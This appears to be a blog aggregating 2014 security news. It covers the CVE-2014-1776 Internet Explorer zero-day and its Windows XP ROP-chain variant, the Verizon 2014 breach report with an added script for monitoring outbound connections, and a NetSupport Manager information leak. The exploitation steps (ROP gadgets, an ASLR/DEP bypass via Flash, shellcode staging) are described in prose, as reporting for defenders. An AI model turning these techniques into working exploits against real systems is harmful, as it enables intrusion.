<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
Details</h2>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The main difference between this new attack targeting Windows XP and the original Windows 7/8.1 version of the attack is the mitigation bypasses. The Windows 7/8.1 version develops its write primitive into read/write access to much of the process space by corrupting Flash vector objects. This is to bypass ASLR by searching for ROP gadgets and building a ROP chain dynamically in memory.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Without ASLR, ROP gadgets can be constructed beforehand with static addresses. Consequently, Flash assistance in the Windows XP version is much simpler. It builds a ROP chain with static addresses to gadgets in MSVCRT, tweaks addresses for a plethora of language packs, and jumps directly to a pivot without developing a write primitive. From there, the ROP chain calls VirtualAlloc to allocate executable memory, copies the shellcode to the allocated chunk, and executes the shellcode.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
This new tactic of specifically targeting those running Windows XP means the risk factors of this vulnerability are now even higher. We have been working with Microsoft and they have released an <a href="https://technet.microsoft.com/en-us/library/security/ms14-may.aspx" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">Out of Band patch</a>. FireEye highly recommends users of Microsoft Internet Explorer apply the patch as soon as possible for security reasons.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/technical/targeted-attack/2014/05/operation-clandestine-fox-now-attacking-windows-xp-using-recently-discovered-ie-vulnerability.html" target="_blank">http://www.fireeye.com/blog/technical/targeted-attack/2014/05/operation-clandestine-fox-now-attacking-windows-xp-using-recently-discovered-ie-vulnerability.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-37707629220790669952014-04-28T21:42:00.003-07:002014-04-28T21:42:55.205-07:00[securityaffairs] FireEye discovered a new zero-day exploit for IE in the wild – Operation Clandestine Fox<h2 style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
FireEye Research Labs has identified a new IE zero-day vulnerability exploited in a series of targeted attacks that are part of Operation Clandestine Fox.<a name='more'></a></h2>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
FireEye Research Labs has identified a <a href="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html">new Internet Explorer (IE) zero-day</a> vulnerability exploited in a series of <a href="http://securityaffairs.co/wordpress/18294/security/fireeye-nation-state-driven-cyber-attacks.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="FireEye World War C report – Nation-state driven cyber attacks">targeted attacks</a>. The <a href="http://securityaffairs.co/wordpress/20275/cyber-crime/nss-labs-zero-day-exploits.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Zero-day vulnerability exploits, too precious commodities">zero-day</a> flaw affects a wide range of versions of the popular browser, from IE6 to IE11, but experts at FireEye observed that the attack targets IE9 through IE11.</div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The impact of the zero-day exploit is significant because affected versions represent about a quarter of the total browser market according to <a href="http://www.netmarketshare.com/browser-market-share.aspx?qprid=2&qpcustomd=0&qpsp=168&qpnp=12&qptimeframe=M" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">NetMarket Share</a>:</div>
<ul style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;">IE 9 13.9%</li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;">IE 10 11.04%</li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;">IE 11 1.32%</li>
</ul>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
This flaw, too, is a remote code execution vulnerability that allows attackers to bypass both ASLR and DEP; Microsoft has assigned it the identifier <a href="https://technet.microsoft.com/en-US/library/security/2963983" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="https://technet.microsoft.com/en-US/library/security/2963983">CVE-2014-1776</a> and issued a specific security advisory.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #5b6770; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“Microsoft is aware of limited, targeted attacks that attempt to exploit a vulnerability in Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, and Internet Explorer 11.</em></div>
<div style="color: #2a2a2a; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>The vulnerability is a remote code execution vulnerability. The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated. The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website.”</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The experts have identified an ongoing campaign named “Operation Clandestine Fox”, but haven’t provided further details on it to avoid interfering with the investigation.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #5b6770; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“The exploit leverages a previously unknown use-after-free vulnerability, and uses a well-known <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/10/aslr-bypass-apocalypse-in-lately-zero-day-exploits.html" style="color: #4298b5; font-weight: bold; text-decoration: none;">Flash exploitation technique</a> to achieve arbitrary memory access and bypass Windows’ ASLR and DEP protections.” reports the official post from FireEye.</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
While Microsoft confirmed that the Enhanced Mitigation Experience Toolkit (EMET) can mitigate the threat by breaking the exploit in the user’s environment, FireEye confirmed that the attack does not work without Adobe Flash present; disabling the Flash plugin within IE therefore prevents the exploit from functioning.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #5b6770; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“Does EMET help mitigate attacks that try to exploit this vulnerability?<span style="color: #2a2a2a;"> </span></em><br style="color: #2a2a2a;" /><em><span style="color: #2a2a2a;">Yes. The Enhanced Mitigation Experience Toolkit (EMET) enables users to manage security mitigation technologies that help make it more difficult for attackers to exploit vulnerabilities in a given piece of software. EMET helps to mitigate this vulnerability in Internet Explorer on systems where EMET is installed and configured to work with Internet Explorer.” reports the advisory issued by Microsoft.</span></em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The experts at FireEye reported another intriguing detail on the investigation, the <a href="http://securityaffairs.co/wordpress/22056/cyber-crime/apt-cost-dramatically-dropping.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Cost of conducting APT campaigns is dramatically dropping">APT group</a> responsible for this zero-day exploit “<em>has been the first group to have access to a select number of browser-based 0-day exploits</em>” in the past.</div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The group appears particularly active and has adopted the countermeasures necessary to avoid being tracked: the bad actors have different backdoors in their arsenal and never reuse the same command and control infrastructure.</div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
FireEye’s investigations allowed the security industry to discover <span style="color: #444444;">eleven <a href="http://securityaffairs.co/wordpress/22818/cyber-crime/2013-advanced-threat-report.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="FireEye 2013 Advanced Threat Report on APTs campaigns">zero-day vulnerabilities</a> during 2013; the company </span>analyzed almost 40,000 unique, advanced attacks, over 100 per day.</div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<img alt="FireEye zero-day 2013" class="aligncenter" height="316" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/03/FireEye-2013-Advanced-Threat-Report-Final-3.jpg" style="display: block; margin-left: auto; margin-right: auto;" title="FireEye discovered a new zero day exploit for IE in the wild Operation Clandestine Fox" width="390" /></div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Stay tuned … FireEye will provide further data as soon as possible.</div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/24403/cyber-crime/fireeye-new-zero-day-ie.html" target="_blank">http://securityaffairs.co/wordpress/24403/cyber-crime/fireeye-new-zero-day-ie.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-29322239057373266802014-04-28T21:41:00.000-07:002014-04-28T21:41:03.092-07:00[securityaffairs] Reading the Verizon Data Breach Investigation Report 2014<h2 style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
Verizon Data Breach Investigation Report 2014, to better understand how attackers can affect company business, and learn the proper countermeasures.<a name='more'></a></h2>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Verizon has released the first data from its annual report titled <a href="http://www.verizonenterprise.com/DBIR/EarlyAccess" style="color: #005399; font-style: inherit; font-weight: inherit; text-decoration: none;" target="_blank" title="http://www.verizonenterprise.com/DBIR/EarlyAccess">Verizon’s 2014 Data Breach Investigations Report (DBIR)</a>. The document includes specific sections on common incident patterns, covering the bad actors, the techniques used, the targets hit, the timelines of the attacks and specific recommendations to mitigate the threat.</div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The experts observed that the majority of incidents could be placed into one of nine principal patterns, discovering a correlation between them and various industries.</div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-attack-patterns.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="Verizon Data Breach Investigation Report 2014 attack patterns" class="aligncenter wp-image-24386" height="230" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-attack-patterns.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="Reading the Verizon Data Breach Investigation Report 2014" width="485" /></a></div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The data for Verizon’s 2014 Data Breach Investigations Report (DBIR) were collected with the participation of 50 contributing global companies, covering 1,367 confirmed data breaches and 63,437 security incidents across 95 countries. Last year was characterized by an impressive number of incidents involving payment systems; 2013 may be remembered as the “year of the retailer breach,” a year in which offensives shifted from geopolitical attacks to large-scale attacks on payment card systems. The report identified the following principal motives for the bad actors responsible for <a href="http://securityaffairs.co/wordpress/22392/security/data-breaches-2013-tripled.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="The number of data breaches in 2013 tripled … and much more">data breaches</a>:</div>
<ul style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;">Financial</li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><a href="http://securityaffairs.co/wordpress/23355/hacking/nsa-hacked-huawei-network.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="NSA hacked Huawei network for cyber espionage">Espionage</a></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><a href="http://securityaffairs.co/wordpress/19789/cyber-crime/jeremy-hammond-vs-fbi.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Jeremy Hammond on state-sponsored hacktivism">Ideology/Fun</a></li>
</ul>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
As shown in the graph, cyber espionage is constantly increasing while a decline has been observed for financial motivation, but I believe it is just a temporary phenomenon. <a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-threat-actor-motivation.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="Verizon Data Breach Investigation Report 2014 threat actor motivation" class="aligncenter wp-image-24380" height="231" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-threat-actor-motivation.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="Reading the Verizon Data Breach Investigation Report 2014" width="467" /></a></div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The industries that were most often victims of <a href="http://securityaffairs.co/wordpress/21915/intelligence/us-intelligence-cyber-threats.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="US Intelligence warns on Counterintelligence and cyber espionage">cyber espionage</a> attacks from other countries are utilities, manufacturing, and mining. The table below reports, for each industry, the percentage of incidents related to each attack category. For example, in the Accommodation industry 75% of the attacks are related to <a href="http://securityaffairs.co/wordpress/21337/cyber-crime/blackpos-malware.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="17-years-old teenager is the author of BlackPOS/Kaptoxa malware (Target), several other breaches may be revealed soon">POS Intrusion</a>.</div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-attack-x-industries.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="Verizon Data Breach Investigation Report 2014 attack x industries" class="aligncenter wp-image-24389" height="326" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-attack-x-industries.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="Reading the Verizon Data Breach Investigation Report 2014" width="463" /></a></div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The report goes on to provide detailed data for each attack method, including recommendations to limit exposure to the cyber threats. Regarding web attacks, the Verizon report finds that the primary causes are the exploitation of weaknesses in the application and the use of stolen credentials to impersonate a valid user.</div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
A significant number of attacks targeted popular content management systems (e.g., Joomla!, <a href="http://securityaffairs.co/wordpress/23005/hacking/162000-wordpress-instances-abused-ddos-attack.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="162,000 WordPress instances abused for DDoS attack">WordPress</a>, or Drupal) to gain control of servers for use in <a href="http://securityaffairs.co/wordpress/20934/cyber-crime/symantec-network-time-protocol-ntp-reflection-ddos-attacks.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Symantec on Network Time Protocol (NTP) reflection DDoS attacks">DDoS</a> campaigns. Security experts at Verizon recommended the following controls to mitigate the threats:</div>
<ul style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; font-style: inherit; font-weight: inherit; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Don’t use single-factor password <a href="http://securityaffairs.co/wordpress/15786/security/two-factor-authentication-for-smbs.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Two-factor Authentication for SMBs">authentication</a> on anything that faces the Internet;</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; font-style: inherit; font-weight: inherit; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Set up automatic patches for any <a href="http://securityaffairs.co/wordpress/16349/cyber-crime/cyber-crime-securities-markets-and-systemic-risk-study-released.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="“Cyber-crime, securities markets and systemic risk” study released">content management system</a> such as Drupal and WordPress;</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; font-style: inherit; font-weight: inherit; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Fix vulnerabilities right away before the bad guys find them;</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; font-style: inherit; font-weight: inherit; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Enforce lockout policies;</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; font-style: inherit; font-weight: inherit; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Monitor outbound connections.</em></li>
</ul>
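<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The last recommendation above, monitoring outbound connections, is the one that catches a CMS host after it has already been taken over for a DDoS campaign: a web server that starts talking to destinations it has no business with is the signal. The following is an added example, not code from Verizon’s report or from the securityaffairs article. It reads constructed firewall log lines and flags web servers that open connections outside an assumed egress allowlist, marking repeated connections to a single destination as possible beaconing. The addresses, the log format, the server inventory and the allowlist are all assumptions for the illustration.</div>

```python
"""Monitor outbound connections from Internet-facing web servers.

Added example (not from the Verizon DBIR or the article): a small
detection over constructed firewall log lines. Addresses, the log format
and the egress allowlist are assumptions for this illustration.
"""
import ipaddress
import re
from collections import Counter

# Constructed firewall log lines (assumed syslog-like format, not real data).
SAMPLE_LOG = """\
2014-04-28T10:00:01 fw1 ACCEPT src=10.0.5.21 dst=10.0.5.10 dport=3306 proto=tcp
2014-04-28T10:00:05 fw1 ACCEPT src=10.0.5.21 dst=203.0.113.7 dport=80 proto=tcp
2014-04-28T10:00:09 fw1 ACCEPT src=10.0.5.21 dst=198.51.100.23 dport=6667 proto=tcp
2014-04-28T10:00:12 fw1 ACCEPT src=10.0.5.22 dst=10.0.5.10 dport=3306 proto=tcp
2014-04-28T10:00:15 fw1 ACCEPT src=10.0.5.22 dst=192.0.2.9 dport=443 proto=tcp
2014-04-28T10:00:20 fw1 ACCEPT src=10.0.5.22 dst=192.0.2.9 dport=443 proto=tcp
2014-04-28T10:00:25 fw1 ACCEPT src=10.0.5.22 dst=192.0.2.9 dport=443 proto=tcp
2014-04-28T10:00:31 fw1 ACCEPT src=10.0.5.22 dst=192.0.2.9 dport=443 proto=tcp
2014-04-28T10:00:33 fw1 ACCEPT src=10.0.9.77 dst=192.0.2.9 dport=443 proto=tcp
"""

LINE_RE = re.compile(
    r"(?P<ts>\S+) \S+ ACCEPT src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) proto=(?P<proto>\w+)$"
)

# Assumed asset inventory: the CMS web servers and the only egress they need.
WEB_SERVERS = {"10.0.5.21", "10.0.5.22"}
ALLOWED_EGRESS = {
    ("10.0.5.10", 3306),   # internal database (assumed)
    ("203.0.113.7", 80),   # CMS update mirror (assumed)
}
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    """True for RFC 1918 addresses; everything else is treated as the Internet."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_log(text):
    """Yield one dict per ACCEPTed connection; lines that do not match are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield {"ts": m["ts"], "src": m["src"], "dst": m["dst"], "dport": int(m["dport"])}


def analyze(log_text, web_servers=WEB_SERVERS, allowed=ALLOWED_EGRESS, beacon_threshold=3):
    """Return one finding per (web server, destination, port) outside the allowlist.

    A destination contacted `beacon_threshold` or more times is flagged as
    possible beaconing, the pattern of a compromised CMS host phoning home.
    """
    counts = Counter()
    for ev in parse_log(log_text):
        if ev["src"] not in web_servers:
            continue                           # other hosts are out of scope here
        if (ev["dst"], ev["dport"]) in allowed:
            continue                           # expected egress
        counts[(ev["src"], ev["dst"], ev["dport"])] += 1

    findings = []
    for (src, dst, dport), n in sorted(counts.items()):
        findings.append({
            "src": src, "dst": dst, "dport": dport, "count": n,
            "external": not is_internal(dst),
            "beaconing": n >= beacon_threshold,
        })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
On the constructed sample the script reports one web server reaching an Internet host on TCP 6667 once and another contacting the same external address on 443 four times, the latter marked as beaconing. The allowlist is deliberately a set of (destination, port) pairs rather than a list of “bad” ports: a hijacked CMS host will happily use 443, so the useful question is whether the destination is one the server is known to need.</div>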
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The report is full of interesting information on data breaches … it’s a must read!</div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/24378/hacking/verizon-data-breach-investigation-2014.html" target="_blank">http://securityaffairs.co/wordpress/24378/hacking/verizon-data-breach-investigation-2014.html</a></div>
[securityaffairs] A flaw in old versions of NetSupport Manager exposes company data (2014-04-28)<h2 style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
Researcher David Kirkpatrick discovered that a flaw in older versions of NetSupport Manager could expose sensitive configuration settings and lead to compromise.<a name='more'></a></h2>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
A vulnerability in older versions of NetSupport Manager could be a source of serious problems for enterprises that use the platform for remote control of PCs and servers. This case is an example of the impact that outdated software has on the overall security of a company. The flaw allows an attacker to access sensitive configuration settings and information.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The vulnerability was discovered by David Kirkpatrick, a security consultant at Trustwave’s SpiderLabs, who described the flaw in a blog <a href="http://blog.spiderlabs.com/2014/04/netsupport-information-leakage-using-nmap-script.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="http://blog.spiderlabs.com/2014/04/netsupport-information-leakage-using-nmap-script.html">post</a>.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
In previous research, documented in a blog <a href="http://blog.spiderlabs.com/2014/03/an-intro-to-netsupport-manager-scripts.html" style="color: #0099ff; font-weight: bold; text-decoration: none;" target="_self">post</a>, the researcher demonstrated how to find versions of NetSupport running on clients with default installations that didn’t require authentication to remotely connect to them. Kirkpatrick wrote a script that used NetSupport to bypass any domain or local credentials, remotely connect to the machine and compromise it; but, as the expert remarked, an attacker needs access to the NetSupport Manager software to run it.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Kirkpatrick has written a simple Nmap script to perform a silent scan searching for vulnerable instances of the software. Kirkpatrick used the Wireshark packet analyzer to analyze the TCP stream of the NetSupport service.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“The ‘Connect’ popup that usually appears on the remote PC, when running the previous NetSupport Manager script, did not pop up when using the Nmap script after a connection,” Kirkpatrick wrote. “This meant I could run this script across the network and the clients would be unaware of my testing of their configuration.”</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Kirkpatrick wrote a specific script to verify whether the response includes the word “License”:</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“If “License” was returned then the information was freely retrieved without authentication. If it wasn’t, that meant that most likely authentication was required to get the results of the query.”</em></div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“With no information on the NetSupport packet format in my test network, I fired up Wireshark and captured all the relevant data sent from the NetSupport Manager when I performed an Inventory query from the Action menu on the manager to another host, as shown below:” said <span style="color: #444444;">Kirkpatrick in the post.</span></em></div>
</blockquote>
